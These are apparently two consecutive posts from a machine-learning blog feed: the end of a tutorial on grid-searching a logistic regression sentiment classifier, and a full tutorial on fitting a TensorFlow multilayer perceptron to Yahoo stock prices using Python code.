**Table 5: Logistic Regression with Custom Vocabulary Results**

As can be seen, there is a modest improvement in the cross-validation performance. Performance on the training data has decreased. This is reasonable as some spurious features have been removed so the potential for over-fitting has been reduced. Finally, some other slight performance improvements can be had by grid searching through the parameters of the feature extractor and classifier.

#Determines locally optimal parameters for the LogisticRegression #classifier using exhaustive search #S: The list of sentences #y: The target vectors of sentiment scores #voc: The vocabulary to use for CountVectorizer #ret: The locally optimal classifier def FindBestParams(S, y, voc): #This will take a long time to run! params = {'penalty':('l1', 'l2'), 'intercept_scaling':np.arange(0.1,10.1,0.1), 'C':np.arange(0.1, 10.1, 0.1)} cv = CountVectorizer(vocabulary = voc) gscv = GridSearchCV(LogisticRegression(), params) gscv.fit(cv.fit_transform(S), y) return gscv #... gscv = FindBestParams(S, y, voc) lr = gscv.best_estimator_ RunCVTest(lr, cv, S, y)

The final results are shown below in Table 6.

Test | Train | All |
---|---|---|

80.60% | 84.80% | 83.40% |

80.80% | 84.55% | 83.30% |

84.60% | 83.10% | 83.60% |

**Table 6: Tuned Results for Logistic Regression**

Further improvements in the size of the data and the performance of the model can probably be had by further tuning of the parameters.

Vectors of word frequencies are a basic type of feature that can be extracted from textual data. Despite the simplicity of the feature, reasonable performance can be achieved. A future blog post will explore some slightly more sophisticated methods available in Scikit-learn and possibly other libraries. I hope to see you then.

]]>

N

]]>

The data used in this post was collected from finance.yahoo.com. The data consists of historical stock data from Yahoo Inc. over the period of the 12th of April 1996 to the 19th of April 2016. The data can be downloaded as a CSV file from the provided link. To pre-process the data for the neural network, first transform the dates into integer values using LibreOffice’s DATEVALUE function. A screen-shot of the transformed data can be seen as follows:

**Figure 1: Pre-Processing Data Using LibreOffice**

For simplicity sake, the “High” value will be computed based on the “Date Value.” Thus, the goal is to create an MLP that takes as input a date in the form of an integer and returns a predicted high value of the Yahoo Inc. stock price for that day.

With the date values saved the spreadsheet, next the data is loaded into python. To improve the performance of the MLP, the data is first scaled so that both the input and output data have mean 0 and variance 1. This can be accomplished as follows (take note that “Date Value” is in column index 1 and “High” is in column index 4):

import numpy as np from TFANN import MLPR import matplotlib.pyplot as mpl from sklearn.preprocessing import scale pth = filePath + 'yahoostock.csv' A = np.loadtxt(pth, delimiter=",", skiprows=1, usecols=(1, 4)) A = scale(A) #y is the dependent variable y = A[:, 1].reshape(-1, 1) #A contains the independent variable A = A[:, 0].reshape(-1, 1) #Plot the high value of the stock price mpl.plot(A[:, 0], y[:, 0]) mpl.show()

The produced plot is as follows:

**Figure 2: Scaled Yahoo Stock Data**

Next, an MLP is constructed and trained on the scaled data.

The MLP class that will be used follows a simple interface similar to that of the python scikit-learn library. The source code is available here. The interface is as follows:

#Fit the MLP to the data #param A: numpy matrix where each row is a sample #param y: numpy matrix of target values def fit(self, A, y): #Predict the output given the input (only run after calling fit) #param A: The input values for which to predict outputs #return: The predicted output values (one row per input sample) def predict(self, A): #Predicts the ouputs for input A and then computes the RMSE between #The predicted values and the actualy values #param A: The input values for which to predict outputs #param y: The actual target values #return: The RMSE def score(self, A, y):

The first step is to create an MLPR object. This can be done as follows:

#Number of neurons in the input layer i = 1 #Number of neurons in the output layer o = 1 #Number of neurons in the hidden layers h = 32 #The list of layer sizes layers = [i, h, h, h, h, h, h, h, h, h, o] mlpr = MLPR(layers, maxItr = 1000, tol = 0.40, reg = 0.001, verbose = True)

With this code, an MLPR object will be initialized with the given layer sizes, a training iteration limit of 1000, an error tolerance of 0.40 (for the RMSE), regularization weight of 0.001, and verbose output enabled. The source code for the MLPR class shows how this is accomplished.

#Create the MLP variables for TF graph #_X: The input matrix #_W: The weight matrices #_B: The bias vectors #_AF: The activation function def _CreateMLP(_X, _W, _B, _AF): n = len(_W) for i in range(n - 1): _X = _AF(tf.matmul(_X, _W[i]) + _B[i]) return tf.matmul(_X, _W[n - 1]) + _B[n - 1] #Add L2 regularizers for the weight and bias matrices #_W: The weight matrices #_B: The bias matrices #return: tensorflow variable representing l2 regularization cost def _CreateL2Reg(_W, _B): n = len(_W) regularizers = tf.nn.l2_loss(_W[0]) + tf.nn.l2_loss(_B[0]) for i in range(1, n): regularizers += tf.nn.l2_loss(_W[i]) + tf.nn.l2_loss(_B[i]) return regularizers #Create weight and bias vectors for an MLP #layers: The number of neurons in each layer (including input and output) #return: A tuple of lists of the weight and bias matrices respectively def _CreateVars(layers): weight = [] bias = [] n = len(layers) for i in range(n - 1): #Fan-in for layer; used as standard dev lyrstd = np.sqrt(1.0 / layers[i]) curW = tf.Variable(tf.random_normal([layers[i], layers[i + 1]], stddev = lyrstd)) weight.append(curW) curB = tf.Variable(tf.random_normal([layers[i + 1]], stddev = lyrstd)) bias.append(curB) return (weight, bias) ... #The constructor #param layers: A list of layer sizes #param actvFn: The activation function to use: 'tanh', 'sig', or 'relu' #param learnRate: The learning rate parameter #param decay: The decay parameter #param maxItr: Maximum number of training iterations #param tol: Maximum error tolerated #param batchSize: Size of training batches to use (use all if None) #param verbose: Print training information #param reg: Regularization weight def __init__(self, layers, actvFn = 'tanh', learnRate = 0.001, decay = 0.9, maxItr = 2000, tol = 1e-2, batchSize = None, verbose = False, reg = 0.001): #Parameters self.tol = tol self.mItr = maxItr self.vrbse = verbose self.batSz = batchSize #Input size self.x = tf.placeholder("float", [None, layers[0]]) #Output size self.y = tf.placeholder("float", [None, layers[-1]]) #Setup the weight and bias variables weight, bias = _CreateVars(layers) #Create the tensorflow MLP model self.pred = _CreateMLP(self.x, weight, bias, _GetActvFn(actvFn)) #Use L2 as the cost function self.loss = tf.reduce_sum(tf.nn.l2_loss(self.pred - self.y)) #Use regularization to prevent over-fitting if(reg is not None): self.loss += _CreateL2Reg(weight, bias) * reg #Use ADAM method to minimize the loss function self.optmzr = tf.train.AdamOptimizer(learning_rate=learnRate).minimize(self.loss)

As seen above, tensorflow placeholder variables are created for the input (x) and the output (y). Next, tensorflow variables for the weight matrices and bias vectors are created using the _CreateVars() function. The weights are initialized as random normal numbers distributed as , where is the fan-in to the layer.

Next, the MLP model is constructed using its definition as discussed in an earlier post. After that, the loss and regularization functions are defined as the L2 loss. Regularization penalizes larger values in the weight matrices and bias vectors to help prevent over-fitting. Lastly, tensorflow’s AdamOptimizer is employed as the training optimizer with the goal of minimizing the loss function. Note that at this stage the learning has not yet been done, only the tensorflow graph has been initialized with the necessary components of the MLP.

Next, the MLP is trained with the Yahoo stock data. A hold-out period is used to assess how well the MLP is performing. This can be accomplished as follows:

#Length of the hold-out period nDays = 5 n = len(A) #Learn the data mlpr.fit(A[0:(n-nDays)], y[0:(n-nDays)])

When the fit function is called, the actual training process begins. First, a tensorflow session must be created and all variables defined in the constructor must be initialized. Then, training iterations are performed up to the iteration limit provided, the weights are updated, and the error is recorded. The feed_dict parameter specifies the values of our inputs (x) and outputs (y). If the error falls below the tolerance level, training is completed, otherwise the maximum number of iterations is exhausted.

#Fit the MLP to the data #param A: numpy matrix where each row is a sample #param y: numpy matrix of target values def fit(self, A, y): m = len(A) #Start the tensorflow session and initializer #all variables self.sess = tf.Session() init = tf.initialize_all_variables() self.sess.run(init) #Begin training for i in range(self.mItr): #Batch mode or all at once if(self.batSz is None): self.sess.run(self.optmzr, feed_dict={self.x:A, self.y:y}) else: for j in range(0, m, self.batSz): batA, batY = _NextBatch(A, y, j, self.batSz) self.sess.run(self.optmzr, feed_dict={self.x:batA, self.y:batY}) err = np.sqrt(self.sess.run(self.loss, feed_dict={self.x:A, self.y:y}) * 2.0 / m) if(self.vrbse): print("Iter " + str(i + 1) + ": " + str(err)) if(err < self.tol): break

With the MLP network trained, prediction can be performed and the results plotted using matplotlib.

#Begin prediction yHat = mlpr.predict(A) #Plot the results mpl.plot(A, y, c='#b0403f') mpl.plot(A, yHat, c='#5aa9ab') mpl.show()

**Figure 3: Actual vs Predicted Stock Data**

As can be seen, the MLP smooths the original stock data. The amount of smoothing is dependent upon the MLP parameters including the number layers, the size of the layers, the error tolerance, and the amount of regularization. In practice it requires a lot of parameter tuning in order to get decent results from a neural network.

]]>